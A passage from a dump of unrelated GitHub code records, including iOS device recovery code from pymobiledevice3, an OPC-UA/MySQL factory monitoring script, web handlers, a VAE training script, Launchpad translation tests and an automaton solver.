We have to re-request the TSS with our nonce.\n self.tss = self.get_tss_response()\n\n self.device.irecv.set_configuration(1)\n\n # Now, before sending iBEC, we must send necessary firmwares on new versions.\n if self.macos_variant:\n # Without this empty policy file & its special signature, iBEC won't start.\n self.send_component_and_command('Ap,LocalPolicy', 'lpolrestore')\n self.send_iboot_stage1_components()\n self.device.irecv.set_autoboot(False)\n self.device.irecv.send_command('setenvnp boot-args rd=md0 nand-enable-reformat=1 -progress -restore')\n self.send_applelogo(allow_missing=False)\n\n mode = self.device.irecv.mode\n # send iBEC\n self.send_component('iBEC')\n\n if self.device.irecv and mode.is_recovery:\n time.sleep(1)\n self.device.irecv.send_command('go', b_request=1)\n\n if self.build_identity.build_manifest.build_major < 20:\n try:\n self.device.irecv.ctrl_transfer(0x21, 1, timeout=5000)\n except USBError:\n pass\n\n self.logger.debug('Waiting for device to disconnect...')\n time.sleep(10)\n\n self.logger.debug('Waiting for device to reconnect in recovery mode...')\n self.reconnect_irecv(is_recovery=True)\n\n def boot_ramdisk(self):\n if self.tss is None:\n self.logger.info('fetching TSS record')\n self.fetch_tss_record()\n\n if self.device.lockdown:\n # normal mode\n self.logger.info('going into Recovery')\n\n # in case lockdown has disconnected while waiting for a ticket\n self.device.lockdown = create_using_usbmux(serial=self.device.lockdown.udid, connection_type='USB')\n self.device.lockdown.enter_recovery()\n\n self.device.lockdown = None\n self.device.irecv = IRecv(self.device.ecid)\n self.reconnect_irecv()\n\n if self.device.irecv.mode == Mode.DFU_MODE:\n # device is currently in DFU mode, place it into recovery mode\n self.dfu_enter_recovery()\n\n elif self.device.irecv.mode.is_recovery:\n # now we load the iBEC\n try:\n self.send_ibec()\n except USBError:\n pass\n\n self.reconnect_irecv(is_recovery=True)\n\n self.logger.info('device booted into recovery')\n\n # now finally do the magic to put the device into restore mode\n self.enter_restore()\n","repo_name":"doronz88/pymobiledevice3","sub_path":"pymobiledevice3/restore/recovery.py","file_name":"recovery.py","file_ext":"py","file_size_in_byte":16475,"program_lang":"python","lang":"en","doc_type":"code","stars":600,"dataset":"github-code","pt":"61"} +{"seq_id":"24806646284","text":"# station 3\r\nfrom opcua import Client\r\nimport time\r\nimport pymysql\r\nimport datetime\r\n\r\ncounter = 0\r\nruntime= 0\r\n\r\n\r\nurl = \"opc.tcp://192.168.0.30:4840\"\r\nclient = Client(url)\r\n\r\nwhile True:\r\n\r\n mydb = pymysql.connect(\r\n host=\"192.168.0.206\",\r\n user=\"Emmanuel_Sim\",\r\n password= \"1221\",\r\n database = \"14octtraining\"\r\n )\r\n cursor = mydb.cursor()\r\n\r\n client.connect()\r\n\r\n status = client.get_node('ns=2;s=Application.GVL_FTS.bFTS_Track0_Sending_gb') \r\n mstatus = status.get_value()\r\n\r\n drivestate = client.get_node('ns=2;s=Application.GVL_VR2109.uiDrive_State') \r\n dstatevalue = drivestate.get_value()\r\n\r\n ftsstate = client.get_node('ns=2;s=Application.GVL_VR2109.uiFTS_Track0_State')\r\n ftsvalue = ftsstate.get_value()\r\n\r\n actualOutput = \"INSERT INTO `actualOutput` (`PID`, `actualOutput`, `time_stamp`) VALUES (%s, %s, %s)\"\r\n runTime = \"INSERT INTO `runTime` (`PID`, `runTime`, `time_stamp`) VALUES (%s, %s, %s)\"\r\n\r\n if mstatus == True:\r\n ts = time.time()\r\n timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\r\n counter += 1\r\n 
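The monitoring loop above reopens both the MySQL connection and the OPC-UA session on every one-second iteration, which is costly. A sketch of a single-shot read that connects once and always disconnects, using only python-opcua calls already present in the script (Client, connect, get_node, get_value, disconnect); the commented call reuses the script's own endpoint and node id, so it only runs against that PLC:

from opcua import Client

def read_nodes_once(url: str, node_ids: list) -> dict:
    """Connect, read each node id once, and always disconnect."""
    client = Client(url)
    client.connect()
    try:
        return {nid: client.get_node(nid).get_value() for nid in node_ids}
    finally:
        client.disconnect()  # runs even if a read raises

# values = read_nodes_once("opc.tcp://192.168.0.30:4840",
#                          ["ns=2;s=Application.GVL_VR2109.uiDrive_State"])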
cursor.execute(actualOutput, ('', counter/2, timestamp))\r\n print('Output Count:', counter/2)\r\n\r\n if dstatevalue == 2 and ftsvalue == 2:\r\n runtime += 1\r\n ts = time.time()\r\n timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\r\n cursor.execute(runTime, ('', runtime, timestamp))\r\n print('Run time:', runtime, 's')\r\n\r\n mydb.commit()\r\n mydb.close()\r\n\r\n client.disconnect()\r\n time.sleep(1)\r\n\r\n client.session_timeout = 10000\r\n","repo_name":"emsiru/OEE_Uploads","sub_path":"OEE_Values.py","file_name":"OEE_Values.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73591221634","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\nimport os\n#from webapp2_extras.i18n import lazy_gettext as _\n\nfrom forms import ContactForm\nfrom models import Contact\nfrom .base import BaseHandler\nfrom .mails import send_contact_mail\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass HelloHandler(BaseHandler):\n def get(self):\n self.response.write(self.app.config)\n self.response.write(self.request)\n\n\nclass HomeHandler(BaseHandler):\n def get(self, locale=None):\n self.set_locale(locale)\n if self.locale == 'zh_TW':\n file_location = os.path.join(\n self.app.config.get('PROJECT_ROOT'),\n \"templates/portfolio_zh_TW.json\",\n )\n elif self.locale == 'zh_CN':\n file_location = os.path.join(\n self.app.config.get('PROJECT_ROOT'),\n \"templates/portfolio_zh_CN.json\",\n )\n else:\n file_location = os.path.join(\n self.app.config.get('PROJECT_ROOT'),\n \"templates/portfolio.json\",\n )\n f = open(file_location, 'rb')\n self.render_response(\n 'index.html', cache_time=self.app.config.get('cache'),\n clients=json.load(f),\n locale=self.locale,\n locales=self.app.config.get('locales'),\n )\n\n\nclass StarterHandler(BaseHandler):\n def get(self):\n self.render_response('starter.html')\n\n\nclass SigninHandler(BaseHandler):\n def get(self):\n self.render_response('signin.html')\n\n\nclass ContactHandler(BaseHandler):\n def get(self):\n params = {\n 'form': ContactForm(self),\n }\n self.render_response('contact.html', **params)\n\n def post(self):\n form = ContactForm(self)\n params = {\n 'form': form,\n }\n self.response.write(form.validate())\n if form.validate():\n contact = Contact(\n name=self.request.get('name'),\n email=self.request.get('email'),\n subject=self.request.get('subject'),\n body=self.request.get('body'),\n )\n contact.put()\n send_contact_mail(self)\n else:\n self.render_response('contact.html', **params)\n","repo_name":"7kfpun/com.getmewrite","sub_path":"handlers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7210546653","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as nu\nimport pandas as pd\nfrom geopy.geocoders import Nominatim\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# In[2]:\n\n\ndata=pd.read_csv(\"E:/Python & R Project/new project/assignment_data.csv\")\ndata\n\n\n# In[3]:\n\n\ndata.head()\n\n\n# In[4]:\n\n\ndata.columns\n\n\n# In[5]:\n\n\ndata.info()\n\n\n# In[6]:\n\n\ndata.describe()\n\n\n# In[7]:\n\n\ndata.isnull().sum()\n\n\n# In[8]:\n\n\ndata.corr()\n\n\n# In[9]:\n\n\nplt.figure(figsize=(14,8))\nsns.heatmap(data.corr(),cmap='Spectral', annot = True)\n\n\n# In[10]:\n\n\ndata.columns\n\n\n# 
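The inserts above bind values through %s placeholders, which is the right pattern: pymysql escapes the bound values, not the SQL text. A condensed helper along the same lines; identifiers (table and column names) cannot be bound as parameters, so they are interpolated here under the assumption, matching the script, that they come from trusted code rather than user input (its tables use the table name as the value column):

import pymysql

def insert_sample(conn, table: str, pid, value, ts) -> None:
    """Insert one measurement row using driver-side parameter escaping."""
    sql = f"INSERT INTO `{table}` (`PID`, `{table}`, `time_stamp`) VALUES (%s, %s, %s)"
    with conn.cursor() as cursor:  # pymysql cursors are context managers
        cursor.execute(sql, (pid, value, ts))
    conn.commit()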
In[11]:\n\n\nsns.pairplot(data,diag_kind='kde');\n\n\n# In[12]:\n\n\nfrom collections import Counter\n\n\n# In[13]:\n\n\nduplicate=data.duplicated()\nprint(duplicate)\n\n\n# In[14]:\n\n\ndata1 = pd.DataFrame([duplicate])\nprint (data1)\n\n\n# In[15]:\n\n\ndata1.describe()\n\n\n# In[28]:\n\n\ndesc = data[\"name\"].describe()\ndesc\n\n","repo_name":"AkshayBDeshmukh/Asssignment","sub_path":"Assignment.py","file_name":"Assignment.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11351650953","text":"class Estadisticas:\n archivoSalida = \"\"\n listaClasificados = []\n cantidadPatrones = 0\n listaComparacion = []\n archivoComparacion = \"\"\n precision = 0\n accuracy = 0\n recall = 0\n tp,fp,tn,fn = 0,0,0,0\n\n def __init__(self,archivoSalida,listaClasificados,archivoComparacion):\n self.archivoSalida = archivoSalida\n self.listaClasificados = listaClasificados\n self.archivoComparacion = archivoComparacion\n\n def leerArchivoComparacion(self):\n archivo = open(self.archivoComparacion,\"r\")\n for linea in archivo:\n patron = linea.split(\",\")\n patron = [round(float(rasgo),1) for rasgo in patron]\n self.listaComparacion.append(patron)\n archivo.close()\n self.cantidadPatrones = len(self.listaComparacion)\n\n def generarMatrizConfusion(self, clasificador):\n if clasificador == 3:\n index = 2\n else: index = 4\n for patron in range(0,len(self.listaClasificados)):\n print(str(self.listaClasificados[patron]) + \" \" + str(self.listaComparacion[patron]))\n if self.listaClasificados[patron][index] == 1 and self.listaComparacion[patron][4] == 1:\n self.tp += 1\n elif self.listaClasificados[patron][index] == 1 and self.listaComparacion[patron][4] == 2:\n self.fp += 1\n elif self.listaClasificados[patron][index] == 2 and self.listaComparacion[patron][4] == 1:\n self.fn += 1\n else:\n self.tn += 1\n print(\"TP \" + str(self.tp) + \"\\tFP \" + str(self.fp) + \"\\nFN \" + str(self.fn) + \"\\tTN \" + str(self.tn))\n self.precision = self.tp / (self.tp + self.fp)\n self.recall = self.tp / (self.tp + self.fn)\n self.accuracy = (self.tp + self.tn) / (self.tp + self.tn + self.fp + self.fn)\n print(\"Precision \" + str(self.precision) + \" recall \" + str(self.recall) + \" accuracy \" + str(self.accuracy))\n","repo_name":"carlos-ochoa/Pattern_Recognition","sub_path":"Estadisticas.py","file_name":"Estadisticas.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27521910764","text":"\ndef inRange(val, caster, minimum, maximum):\n try:\n castedVal = caster(val)\n if minimum < castedVal < maximum:\n return True\n except:\n return False\n\n\ndef neighbourhoodValidator(val, caster):\n try:\n neighbourhoods = caster(val)\n\n if neighbourhoods[0] == 4 or neighbourhoods[0] == 8:\n if neighbourhoods[1] == 4 or neighbourhoods[1] == 8:\n return True\n except:\n return False\n\n\ndef thresholdValidator(val, caster):\n return inRange(val, caster, 0, 255)\n\n\ndef resizeValidator(val, caster):\n return inRange(val, caster, 0, float('inf'))\n\n\ndef strElementValidator(val, caster):\n try:\n width = caster(val)\n if width > 0 and width % 2 == 1:\n return True\n except:\n return 
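generarMatrizConfusion above divides by tp + fp and tp + fn unconditionally, so a run in which one class is never predicted raises ZeroDivisionError. A small guard-first version of the same metrics:

def prf_counts(tp: int, fp: int, fn: int, tn: int) -> dict:
    """Precision/recall/accuracy from confusion counts, guarding empty denominators."""
    precision = tp / (tp + fp) if (tp + fp) else 0.0
    recall = tp / (tp + fn) if (tp + fn) else 0.0
    total = tp + fp + fn + tn
    accuracy = (tp + tn) / total if total else 0.0
    return {"precision": precision, "recall": recall, "accuracy": accuracy}

print(prf_counts(tp=8, fp=2, fn=1, tn=9))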
False","repo_name":"ondra-vaic/Skeletonization","sub_path":"ZVI/src/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11757477739","text":"from models import *\r\nfrom preprocess import *\r\n# from torch.utils.tensorboard import SummaryWriter\r\nfrom torchvision.utils import make_grid\r\nfrom torch.utils.data import DataLoader\r\nfrom torchvision import transforms\r\nfrom tqdm import tqdm\r\nimport torch.optim as optim\r\nfrom matplotlib import pyplot as plt\r\n\r\nBATCH_SIZE = 64\r\n\r\nimage_transform = transforms.Compose([transforms.ToTensor()])\r\ntrain_data = LoadCelebFaces(transform=image_transform)\r\ntrain_loader = DataLoader(train_data, batch_size=64, shuffle=True)\r\n\r\nprint(f'''Training Data Size: {len(train_data)}\\n''')\r\n\r\ncuda = torch.cuda.is_available()\r\n\r\nmodel = VAE()\r\nif cuda:\r\n model = model.cuda()\r\nprint_model_architecture = lambda model: f'\\nModel Architecture' + '='*32 + '\\n' + f'{model}\\n' + '='*32 + '\\n'\r\nprint(print_model_architecture(model))\r\n\r\ndef loss_function(reconstructed_x, x, mean, logvar):\r\n BCE = F.binary_cross_entropy(reconstructed_x, x, reduction='sum')\r\n KLD = -0.5 * torch.sum(1 + logvar - mean.pow(2) - logvar.exp())\r\n\r\n return BCE + KLD\r\n\r\ndef plot_img(image, epoch, cmap='gray'):\r\n plt.imshow(image.permute(1, 2, 0), cmap=cmap)\r\n plt.axis('off')\r\n plt.title(f'Generated Image after {epoch} epochs')\r\n plt.show()\r\n\r\ndef train(model, train, EPOCHS):\r\n print('Model Training...')\r\n model.train()\r\n training_loss = []\r\n\r\n optimizer = optim.Adam(model.parameters(), lr=0.001)\r\n version = 1\r\n\r\n for epoch in range(EPOCHS):\r\n train_loss = 0.0\r\n for i, data in enumerate(train):\r\n\r\n optimizer.zero_grad()\r\n\r\n if cuda:\r\n data = data.cuda()\r\n\r\n out, mean, std = model(data)\r\n loss = loss_function(out, data.float(), mean, std)\r\n loss.backward()\r\n\r\n train_loss += loss.item()\r\n\r\n optimizer.step()\r\n\r\n if i % 500 == 499:\r\n print(f'Epoch {epoch+1}, Batch [{i+1}/{len(train)}], Training Loss {loss.item()/i+1}')\r\n\r\n average_train_loss = train_loss / len(train)\r\n print(f'Training Set Loss {epoch+1}: {round(average_train_loss, 4)}')\r\n training_loss.append(average_train_loss)\r\n\r\n if epoch % 25 == 0:\r\n torch.save(model.state_dict(), f\"./models/face_generatorE{epoch+1}v{version}.pt\")\r\n version += 1\r\n \r\n model.eval()\r\n with torch.no_grad():\r\n z = torch.randn(BATCH_SIZE, 800)\r\n if cuda:\r\n z = z.cuda()\r\n output_img = model.decode(z).cpu()\r\n print(output_img.shape)\r\n\r\n grid_img = make_grid(output_img, nrow=8)\r\n plot_img(grid_img, epoch, cmap='gray')\r\n model.train()\r\n return model, training_loss\r\n\r\nmodel, training_loss = train(model, train_loader, 100)\r\ntorch.save(model.state_dict(), \"./models/face_generatorE100v5.pt\")\r\n","repo_name":"ppvalluri09/Face-Generation-with-Variational-Autoencoders","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39958458638","text":"def maximum(A, n):\n\t\n\tif (n == 0):\n\t\treturn A[n]\n\n\tmax_value = maximum(A, n-1)\n\n\tif (max_value > A[n]):\n\t\treturn max_value\n\telse: \n\t\treturn A[n]\n\nA = [8,2,4,7,1]\n\nprint(maximum(A, 
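loss_function above is the standard VAE objective, summed binary cross-entropy plus the analytic KL term; note it assumes the third tensor the model returns is the log-variance (the training loop binds it to a variable named std but uses it as logvar). A self-contained restatement of the loss together with the reparameterization trick such a model typically applies internally; the VAE class itself is not shown, so that part is an assumption:

import torch
import torch.nn.functional as F

def reparameterize(mean: torch.Tensor, logvar: torch.Tensor) -> torch.Tensor:
    """Sample z = mean + sigma * eps with sigma = exp(0.5 * logvar)."""
    std = torch.exp(0.5 * logvar)
    return mean + std * torch.randn_like(std)

def vae_loss(recon_x, x, mean, logvar):
    """Reconstruction term (BCE, summed) plus the analytic KL divergence to N(0, I)."""
    bce = F.binary_cross_entropy(recon_x, x, reduction="sum")
    kld = -0.5 * torch.sum(1 + logvar - mean.pow(2) - logvar.exp())
    return bce + kld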
4))\n","repo_name":"prateekiiest/sage-covid","sub_path":"code_scripts/max_2.py","file_name":"max_2.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36046230174","text":"__metaclass__ = type\n\nfrom storm.store import Store\nfrom zope.component import getUtility\nfrom zope.event import notify\nfrom zope.security.proxy import removeSecurityProxy\n\nfrom lp.app.enums import InformationType\nfrom lp.app.interfaces.launchpad import ILaunchpadCelebrities\nfrom lp.buildmaster.interfaces.buildfarmjob import IBuildFarmJobOld\nfrom lp.buildmaster.interfaces.buildqueue import IBuildQueueSet\nfrom lp.buildmaster.model.buildqueue import BuildQueue\nfrom lp.code.interfaces.branch import IBranchSet\nfrom lp.code.interfaces.branchjob import IBranchJob\nfrom lp.code.model.branchjob import BranchJob\nfrom lp.code.model.directbranchcommit import DirectBranchCommit\nfrom lp.codehosting.scanner import events\nfrom lp.services.database.interfaces import IStore\nfrom lp.services.job.model.job import Job\nfrom lp.testing import (\n TestCaseWithFactory,\n verifyObject,\n )\nfrom lp.testing.layers import (\n LaunchpadZopelessLayer,\n ZopelessDatabaseLayer,\n )\nfrom lp.translations.interfaces.translations import (\n TranslationsBranchImportMode,\n )\nfrom lp.translations.interfaces.translationtemplatesbuildjob import (\n ITranslationTemplatesBuildJobSource,\n )\nfrom lp.translations.model.translationtemplatesbuildjob import (\n TranslationTemplatesBuildJob,\n )\n\n\ndef get_job_id(job):\n \"\"\"Peek inside a `Job` and retrieve its id.\"\"\"\n return removeSecurityProxy(job).id\n\n\nclass TestTranslationTemplatesBuildJob(TestCaseWithFactory):\n \"\"\"Test `TranslationTemplatesBuildJob`.\"\"\"\n\n layer = ZopelessDatabaseLayer\n\n def setUp(self):\n super(TestTranslationTemplatesBuildJob, self).setUp()\n self.jobset = getUtility(ITranslationTemplatesBuildJobSource)\n self.branch = self.factory.makeBranch()\n self.specific_job = self.jobset.create(self.branch)\n\n def test_new_TranslationTemplatesBuildJob(self):\n # TranslationTemplateBuildJob implements IBuildFarmJobOld,\n # and IBranchJob.\n verifyObject(IBranchJob, self.specific_job)\n verifyObject(IBuildFarmJobOld, self.specific_job)\n\n # Each of these jobs knows the branch it will operate on.\n self.assertEqual(self.branch, self.specific_job.branch)\n\n def test_has_Job(self):\n # Associated with each TranslationTemplateBuildJob is a Job.\n base_job = self.specific_job.job\n self.assertIsInstance(base_job, Job)\n\n # From a Job, the TranslationTemplatesBuildJobSource can find the\n # TranslationTemplatesBuildJob back for us.\n specific_job_for_base_job = removeSecurityProxy(\n TranslationTemplatesBuildJob.getByJob(base_job))\n self.assertEqual(self.specific_job, specific_job_for_base_job)\n\n def test_has_BuildQueue(self):\n # There's also a BuildQueue item associated with the job.\n queueset = getUtility(IBuildQueueSet)\n job_id = get_job_id(self.specific_job.job)\n buildqueue = queueset.get(job_id)\n\n self.assertIsInstance(buildqueue, BuildQueue)\n self.assertEqual(job_id, get_job_id(buildqueue.job))\n\n def test_BuildQueue_for_arch(self):\n # BuildQueue entry is for i386 (default Ubuntu) architecture.\n queueset = getUtility(IBuildQueueSet)\n job_id = get_job_id(self.specific_job.job)\n buildqueue = queueset.get(job_id)\n\n ubuntu = getUtility(ILaunchpadCelebrities).ubuntu\n self.assertEquals(\n ubuntu.currentseries.nominatedarchindep.processor,\n 
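The recursive maximum above uses one call frame per element, so lists longer than Python's default recursion limit (about 1000) raise RecursionError. An iterative equivalent, checked against the builtin:

def maximum(values):
    """Iterative counterpart of the recursive version; no recursion-depth limit."""
    best = values[0]
    for v in values[1:]:
        if v > best:
            best = v
    return best

assert maximum([8, 2, 4, 7, 1]) == max([8, 2, 4, 7, 1]) == 8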
buildqueue.processor)\n\n def test_score(self):\n # For now, these jobs always score themselves at 2510. In the\n # future however the scoring system is to be revisited.\n self.assertEqual(2510, self.specific_job.score())\n\n def test_cleanUp(self):\n # TranslationTemplatesBuildJob has its own customized cleanup\n # behaviour, since it's actually a BranchJob.\n job = removeSecurityProxy(self.specific_job.job)\n buildqueue = IStore(BuildQueue).find(BuildQueue, job=job).one()\n\n job_id = job.id\n store = Store.of(job)\n branch_name = self.branch.unique_name\n\n buildqueue.destroySelf()\n\n # BuildQueue is gone.\n self.assertIs(\n None, store.find(BuildQueue, BuildQueue.job == job_id).one())\n # Job is gone.\n self.assertIs(None, store.find(Job, Job.id == job_id).one())\n # TranslationTemplatesBuildJob is gone.\n self.assertIs(None, TranslationTemplatesBuildJob.getByJob(job_id))\n # Branch is still here.\n branch_set = getUtility(IBranchSet)\n self.assertEqual(self.branch, branch_set.getByUniqueName(branch_name))\n\n\nclass FakeTranslationTemplatesJobSource(TranslationTemplatesBuildJob):\n \"\"\"Fake utility class.\n\n Allows overriding of _hasPotteryCompatibleSetup.\n\n How do you fake a utility that is implemented as a class, not a\n factory? By inheriting from `TranslationTemplatesJob`, this class\n \"copies\" the utility. But you can make it fake the utility's\n behavior by setting an attribute of the class (not an object!) at\n the beginning of every test.\n \"\"\"\n # Fake _hasPotteryCompatibleSetup, and if so, make it give what\n # answer?\n fake_pottery_compatibility = None\n\n @classmethod\n def _hasPotteryCompatibleSetup(cls, branch):\n if cls.fake_pottery_compatibility is None:\n # No fake compatibility setting call the real method.\n return TranslationTemplatesBuildJob._hasPotteryCompatibleSetup(\n branch)\n else:\n # Fake pottery compatibility.\n return cls.fake_pottery_compatibility\n\n\nclass TestTranslationTemplatesBuildJobSource(TestCaseWithFactory):\n \"\"\"Test `TranslationTemplatesBuildJobSource`.\"\"\"\n\n layer = LaunchpadZopelessLayer\n\n def setUp(self):\n super(TestTranslationTemplatesBuildJobSource, self).setUp()\n self.jobsource = FakeTranslationTemplatesJobSource\n self.jobsource.fake_pottery_compabitility = None\n\n def tearDown(self):\n self._fakePotteryCompatibleSetup(compatible=None)\n super(TestTranslationTemplatesBuildJobSource, self).tearDown()\n\n def _makeTranslationBranch(self, fake_pottery_compatible=None):\n \"\"\"Create a branch that provides translations for a productseries.\"\"\"\n if fake_pottery_compatible is None:\n self.useBzrBranches(direct_database=True)\n branch, tree = self.create_branch_and_tree()\n else:\n branch = self.factory.makeAnyBranch()\n product = removeSecurityProxy(branch.product)\n trunk = product.getSeries('trunk')\n trunk.branch = branch\n trunk.translations_autoimport_mode = (\n TranslationsBranchImportMode.IMPORT_TEMPLATES)\n\n self._fakePotteryCompatibleSetup(fake_pottery_compatible)\n\n return branch\n\n def _fakePotteryCompatibleSetup(self, compatible=True):\n \"\"\"Mock up branch compatibility check.\n\n :param compatible: Whether the mock check should say that\n branches have a pottery-compatible setup, or that they\n don't.\n \"\"\"\n self.jobsource.fake_pottery_compatibility = compatible\n\n def test_baseline(self):\n utility = getUtility(ITranslationTemplatesBuildJobSource)\n verifyObject(ITranslationTemplatesBuildJobSource, utility)\n\n def test_generatesTemplates(self):\n # A branch \"generates templates\" if it is 
a translation branch\n # for a productseries that imports templates from it; is not\n # private; and has a pottery compatible setup.\n # For convenience we fake the pottery compatibility here.\n branch = self._makeTranslationBranch(fake_pottery_compatible=True)\n self.assertTrue(self.jobsource.generatesTemplates(branch))\n\n def test_not_pottery_compatible(self):\n # If pottery does not see any files it can work with in the\n # branch, generatesTemplates returns False.\n branch = self._makeTranslationBranch()\n self.assertFalse(self.jobsource.generatesTemplates(branch))\n\n def test_branch_not_used(self):\n # We don't generate templates branches not attached to series.\n branch = self._makeTranslationBranch(fake_pottery_compatible=True)\n\n trunk = branch.product.getSeries('trunk')\n removeSecurityProxy(trunk).branch = None\n\n self.assertFalse(self.jobsource.generatesTemplates(branch))\n\n def test_not_importing_templates(self):\n # We don't generate templates when imports are disabled.\n branch = self._makeTranslationBranch(fake_pottery_compatible=True)\n\n trunk = branch.product.getSeries('trunk')\n removeSecurityProxy(trunk).translations_autoimport_mode = (\n TranslationsBranchImportMode.NO_IMPORT)\n\n self.assertFalse(self.jobsource.generatesTemplates(branch))\n\n def test_private_branch(self):\n # We don't generate templates for private branches.\n branch = self._makeTranslationBranch(fake_pottery_compatible=True)\n removeSecurityProxy(branch).information_type = (\n InformationType.USERDATA)\n self.assertFalse(self.jobsource.generatesTemplates(branch))\n\n def test_scheduleTranslationTemplatesBuild_subscribed(self):\n # If the feature is enabled, a TipChanged event for a branch that\n # generates templates will schedule a templates build.\n branch = self._makeTranslationBranch()\n removeSecurityProxy(branch).last_scanned_id = 'null:'\n commit = DirectBranchCommit(branch)\n commit.writeFile('POTFILES.in', 'foo')\n commit.commit('message')\n notify(events.TipChanged(branch, None, False))\n branchjobs = list(TranslationTemplatesBuildJob.iterReady())\n self.assertEqual(1, len(branchjobs))\n self.assertEqual(branch, branchjobs[0].branch)\n\n def test_scheduleTranslationTemplatesBuild(self):\n # If the feature is enabled, scheduleTranslationTemplatesBuild\n # will schedule a templates build whenever a change is pushed to\n # a branch that generates templates.\n branch = self._makeTranslationBranch(fake_pottery_compatible=True)\n\n self.jobsource.scheduleTranslationTemplatesBuild(branch)\n\n store = IStore(BranchJob)\n branchjobs = list(store.find(BranchJob, BranchJob.branch == branch))\n self.assertEqual(1, len(branchjobs))\n self.assertEqual(branch, branchjobs[0].branch)\n\n def test_create(self):\n branch = self._makeTranslationBranch(fake_pottery_compatible=True)\n\n specific_job = self.jobsource.create(branch)\n\n # A job is created with the branch URL in its metadata.\n metadata = specific_job.metadata\n self.assertIn('branch_url', metadata)\n url = metadata['branch_url']\n head = 'http://'\n self.assertEqual(head, url[:len(head)])\n tail = branch.name\n self.assertEqual(tail, url[-len(tail):])\n\n def test_create_with_build(self):\n branch = self._makeTranslationBranch(fake_pottery_compatible=True)\n specific_job = self.jobsource.create(branch, testing=True)\n naked_job = removeSecurityProxy(specific_job)\n self.assertEquals(naked_job._constructed_build, 
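The FakeTranslationTemplatesJobSource pattern above (subclass the real utility and let tests toggle a single class attribute, with None meaning "defer to the real check") generalizes well beyond Launchpad. A toy version with hypothetical names:

class RealChecker:
    @classmethod
    def is_compatible(cls, branch: str) -> bool:
        return branch.endswith(".pot")  # stand-in for the expensive real check

class FakeChecker(RealChecker):
    """Subclass 'copies' the utility; tests toggle one class attribute to fake it."""
    fake_result = None  # None means: fall through to the real implementation

    @classmethod
    def is_compatible(cls, branch: str) -> bool:
        if cls.fake_result is None:
            return RealChecker.is_compatible(branch)
        return cls.fake_result

FakeChecker.fake_result = True
assert FakeChecker.is_compatible("anything") is True
FakeChecker.fake_result = None  # tearDown must reset class state between tests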
specific_job.build)\n","repo_name":"abramhindle/UnnaturalCodeFork","sub_path":"python/testdata/launchpad/lib/lp/translations/tests/test_translationtemplatesbuildjob.py","file_name":"test_translationtemplatesbuildjob.py","file_ext":"py","file_size_in_byte":11207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5991266367","text":"#!/usr/bin/python\nimport sys\nfrom collections import *\nfrom itertools import *\n\nsteps,alphabet = sys.stdin.readline().split()\nsteps = int(steps)\nrules = sys.stdin.readline()\n\nclass Auto:\n def __init__(self,n):\n self.nb=n\n self.out=[dict() for _ in range(n)]\n self.defout=[-1 for _ in range(n)]\n self.fin = [] \n \n @classmethod\n def from_rule(cls,rule):\n res = cls(len(rule)-1)\n fail = 0\n dec = 0\n for i in range(res.nb):\n if rule[i]=='>':\n dec=1\n fail=i\n else:\n if fail != i:\n res.out[i][rule[fail+dec]]=(fail+1)%res.nb\n res.out[i][rule[i+dec]]=(i+1)%res.nb\n res.defout[i]=fail\n if fail == 0:\n res.fin.append(i)\n # print(\" ====== FROM \"+rule+\" ===== \")\n # res.show()\n return res\n\n @classmethod\n def product(cls,a,b):\n if b is None:\n return a\n res = cls(a.nb*b.nb)\n for sa in range(a.nb):\n for sb in range(b.nb):\n s=sa*b.nb+sb\n res.defout[s] = a.defout[sa]*b.nb+b.defout[sb] \n for (c,ta) in a.out[sa].items():\n if c in b.out[sb]:\n res.out[s][c] = ta*b.nb+b.out[sb][c]\n else:\n res.out[s][c] = ta*b.nb+b.defout[sb]\n for (c,tb) in b.out[sb].items():\n if not (c in a.out[sa]):\n res.out[s][c] = a.defout[sa]*b.nb+tb\n res.fin = [ sa*b.nb+sb for (sa,sb) in product(a.fin,b.fin)]\n # print(\" ====== PRODUCT ===== \")\n # res.show()\n return res\n\n @classmethod\n def from_ruleset(cls,rules):\n if len(rules) == 1:\n return cls.from_rule(rules[0])\n else:\n return cls.trim(cls.product(cls.from_ruleset(rules[:len(rules)//2]),\n cls.from_ruleset(rules[len(rules)//2:]))) \n\n def show(self):\n print(\"Auto with \"+str(self.nb)+\" states\")\n for i in range(self.nb):\n for (c,s) in self.out[i].items():\n print( str(i) + \"-- \"+c+\" --> \"+str(s) )\n print(\"def ---> \"+str(self.defout[i]))\n print(\"Finals: \"+str(self.fin))\n\n @classmethod\n def trim(cls,a):\n res = cls(a.nb)\n accessible_states = [0]\n cur = 0\n remap = dict()\n remap[0]=0\n while cur < len(accessible_states):\n for (c,disc) in a.out[accessible_states[cur]].items():\n if disc not in remap:\n remap[disc] = len(accessible_states)\n accessible_states.append(disc)\n res.out[cur][c] = remap[disc]\n if a.defout[accessible_states[cur]] not in remap:\n remap[a.defout[accessible_states[cur]]] = len(accessible_states)\n accessible_states.append(a.defout[accessible_states[cur]])\n res.defout[cur] = 